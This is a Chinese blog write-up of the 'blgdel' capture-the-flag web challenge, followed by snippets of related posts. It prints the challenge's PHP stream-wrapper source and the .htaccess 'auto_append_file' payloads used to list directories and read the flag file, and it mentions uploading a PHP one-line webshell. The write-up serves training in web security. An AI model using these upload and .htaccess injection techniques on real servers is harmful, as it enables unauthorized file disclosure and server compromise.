攻防世界--blgdel

最新推荐文章于 2023-06-20 14:16:53 发布
最新推荐文章于 2023-06-20 14:16:53 发布
阅读量985 收藏
点赞数
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/122271104
版权

进入页面后看到有注册和登陆按钮,先注册一个账号

由于这里涉及到金额,尝试查看session和抓包都没能更改数字
尝试其它办法,这里看到有一个上传头像,但点进去显示

还记得在注册的时候有一个推荐人框,尝试拉人头注册
集齐十个人头就可以上传和搜索文件

下一步需要知道文件路径,发现存在uploads目录

进入之后可以实现目录遍历,查找我们上传图片的路径 

上传一句话后发现有过滤了一些东西,回头又扫了一下目录发现robots.txt中有config.txt,审码

<?php

class master
{
	private $path;
	private $name;
	
	function __construct()
	{
		
	}
	
	function stream_open($path)
	{
		if(!preg_match('/(.*)\/(.*)$/s',$path,$array,0,9))
			return 1;
		$a=$array[1];
		parse_str($array[2],$array);
		
		if(isset($array['path']))
		{
			$this->path=$array['path'];
		}
		else
			return 1;
		if(isset($array['name']))
		{
			$this->name=$array['name'];
		}
		else
			return 1;
		
		if($a==='upload')
		{
			return $this->upload($this->path,$this->name);
		}
		elseif($a==='search')
		{
			return $this->search($this->path,$this->name);
		}
		else 
			return 1;
	}
	function upload($path,$name)
	{
		if(!preg_match('/^uploads\/[a-z]{10}\/$/is',$path)||empty($_FILES[$name]['tmp_name']))
			return 1;
		
		$filename=$_FILES[$name]['name'];
		echo $filename;
		
		$file=file_get_contents($_FILES[$name]['tmp_name']);
		
		$file=str_replace('<','!',$file);
		$file=str_replace(urldecode('%03'),'!',$file);
		$file=str_replace('"','!',$file);
		$file=str_replace("'",'!',$file);
		$file=str_replace('.','!',$file);
		if(preg_match('/file:|http|pre|etc/is',$file))
		{
			echo 'illegalbbbbbb!';
			return 1;
		}
		
		file_put_contents($path.$filename,$file);
		file_put_contents($path.'user.jpg',$file);
		
		
		echo 'upload success!';
		return 1;
	}
	function search($path,$name)
	{
		if(!is_dir($path))
		{
			echo 'illegal!';
			return 1;
		}
		$files=scandir($path);
		echo '</br>';
		foreach($files as $k=>$v)
		{
			if(str_ireplace($name,'',$v)!==$v)
			{
				echo $v.'</br>';
			}
		}
		
		return 1;
	}
	
	function stream_eof()
	{
		return true;
	}
	function stream_read()
	{
		return '';
	}
	function stream_stat()
	{
		return '';
	}
	
}

stream_wrapper_unregister('php');
stream_wrapper_unregister('phar');
stream_wrapper_unregister('zip');
stream_wrapper_register('master','master');

?>

这里用到了.htaccess,通过修改配置来查找flag

php_value auto_append_file master://search/path=%2fhome%2f&name=flag

%2f 是 / 因为他里面有一次匹配规则,所以需要使用%2f绕过

这里的master search path name 都是在代码中他自己写的
这里只是调用它的功能 

上传成功后再随便访问一个php文件即可

在上传一个内容为以下内容的.htaccess文件

php_value auto_append_file /home/hiahiahia_flag

再次访问.php文件即可得到flag
 

参考:

CTF中.htaccess文件的利用 | CN-SEC 中文网

Uzero.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界blgdel
qq_43774856的博客
12-07 361
攻防世界blgdel 打开链接,如图所示 先注册一个账号 并没有发现什么可以利用的点,只能用dirsearch扫一扫了 发现了robots.txt,config.txt,sql.txt,upload.php robots.txt config.txt <?php class master { private $path; private $name; function __construct() { } function stream_open($path) {
攻防世界 blgdel
xiaoqi199915的博客
06-02 1022
攻防世界 blgdel 小白的刷题之路 从0到1 扫描一下目录 发现robots.php 进行访问 发现一个config.txt 打开发现的是源代码 观察代码发现好多正则匹配的原则 和一些过滤的规则 还是没有方向 返回主页面进行查看 发现一个注册和登陆的界面 先随便注册一个账户 点开了头像 发现是一个上传页面 ,猜测是一个上传 上传一个php一句话 提示我们权限不够 审查源代码 看见一个推荐人的信息 没有办法 连续注册了12次!!!!! 发现积分变成了120 此时在上传 发现可以上传 在次上传一个php
【愚公系列】2023年06月 攻防世界-Web(blgdel
时光隧道
06-20 6989
PHP文件上传漏洞是指攻击者能够通过上传恶意文件来执行恶意代码,从而控制服务器或窃取敏感数据的安全漏洞。一般来说,攻击者会将一些包含恶意代码的文件伪装成图片、压缩包等常见格式的文件,骗取用户上传,进而向网站提交指定的文件名,替换掉原有的文件,造成恶意代码的执行,危害网站安全。攻击者可以通过以下方式来利用PHP文件上传漏洞:上传Webshell:攻击者可以上传包含恶意代码的Webshell,通过Webshell控制服务器,获取敏感信息,或者利用Webshell进行后续攻击。
xctf攻防世界 Web高手进阶区 blgdel
l8947943的博客
01-09 574
1.进入环境,查看内容 乱点一通,注册个账号,没有什么发现,秒杀页面有些奇怪,但也没有重要的提示,使用dirsearch扫一扫,看看有啥,如图: 我们发现有robots.txt,那就从这里入手吧! 2. 问题分析 查看robots.txt 打开后,提示config.txt是入手点,那就访问一下,打开后是一堆代码,如下: <?php class master { private $path; private $name; function __construct() { }
攻防世界web新手
qq_45684803的博客
07-09 236
攻防世界web 1.xff_referer 打开场景发现此题对IP地址进行了限制: 我们采用burpsoup进行抓包,然后更改http请求头: 由于提示了xff和referer都可以进行伪造,所以尝试增加X-Forwarded-For: 123.123.123.123与Referer: https://www.google.com: 于是得到了flag:cyberpeace{0132c7f83b1441e97636072c5207c8d8} 2.command_execution 我们首先输入1
攻防世界-web新手区
hanqdi_的博客
02-18 329
view_source 根据题目描述,要查看一个网页的源代码,按照之前的操作,要么右键-》查看源代码,要么按f12查看源代码,这里鼠标右键不管用了,就按f12(Mac里按command+option+4) 还可以根据题目提示,view_source,可以用view-source指令查看源代码:view-source:网址 例如: robots 根据提示,用到robots协议。 什么是robo...
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界nice-bgm杂项
11-20
在网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界Let-god-knows杂项
11-20
攻防世界Let_god_knows杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947532
攻防世界misc2-1杂项
11-20
攻防世界misc2-1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947409
攻防世界杂项津门杯2021-m1
11-14
攻防世界杂项津门杯2021-m1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127840757
攻防世界-Web进阶区-bug
feng的博客
09-14 553
前言 这题主要涉及了各种绕过,也需要一点点的脑洞或者fuzz,这题还是比较好的。 WP
攻防世界 mobile 新手 RememberOther
weixin_44626823的博客
06-05 403
输入用户名、注册码,如果正确即可获得flag 执行结果,知道其使用了checkSN函数 在中得知如果为则显示成功的 checkSN函数如下所示,只要Hook它,让它的返回值为true即可 代码生效后,用户名和注册码随意输入即可获取注册码 但是我们不能获取它的值,这就很难受了,那就继续分析代码。Toast.makeText(MainActivity.this, (int) C0062R.string.successed, 0).show();根据Toast函数的原型,如下图所示:第二个参数就是要显示的文
攻防世界(WEB)weak_auth
qq_54929891的博客
08-24 725
进入网页,出来一个登录注册页面 接着自己用自己的账号密码去注册试一下 结果点击login后出来一个提示弹窗:请用admin账号登录,但是我们不知道密码,我在这个时候也很莫名其妙的,没有碰过这种题目,便想着打开一下F12看看还有没有提示 发现有个注释,可能你需要字典。 第一时间我以为密码是要像字典那样,但我心想那么多数字字母,我怎么知道,然后上网查询了一下,原来这里提示我们要字典是要进行密码爆破(第一次接触这玩意儿) 按照搜的教程学习怎么进行爆破 在抓取的请求中,右键点击发送到i...
攻防世界 unfinish
CyhDl666的博客
02-25 511
题目描述:sql注入 访问进去是个登录页面 dirsearch扫描了一下 访问register.php 注册了个账号 登录进去好像没什么用 返回登录页面 但是 这里我想到了一个注入方式 在我写sql注入基础知识的时候提到过 但是 没有仔细研究 二次注入 这里注入的点应该是在register.php页面中的name中 因为邮箱和密码还需要登录时候使用 具体可以看我前面的文章 单引号注册失败了 于是我将用户名改为root' and '1这里注册成功了 也就是说这里的闭合方式应该是单引号闭合 且没有我之前学.
攻防世界-baby_web详解
最新发布
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码来获取敏感信息或者执行未经授权的操作。 为了详细了解攻防世界-baby_web的攻击和防御方法,我们可以进行以下步骤: 1. 分析源代码:通过查看源代码,我们可以了解应用程序的结构和逻辑,以及可能存在的漏洞点。 2. 注入攻击:尝试使用注入攻击来获取数据库信息或者执行其他恶意操作。可以使用工具如sqlmap来自动化进行注入测试。 3. 防御措施:了解并实施防御措施,如输入验证、参数化查询、安全编码等,以防止注入攻击和其他常见的安全漏洞。 请注意,进行任何形式的攻击都是非法的,除非您是经过授权的安全专家或者在合法的渗透测试环境中进行。在现实世界中,攻击和防御是一个持续的过程,需要不断学习和更新知识。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值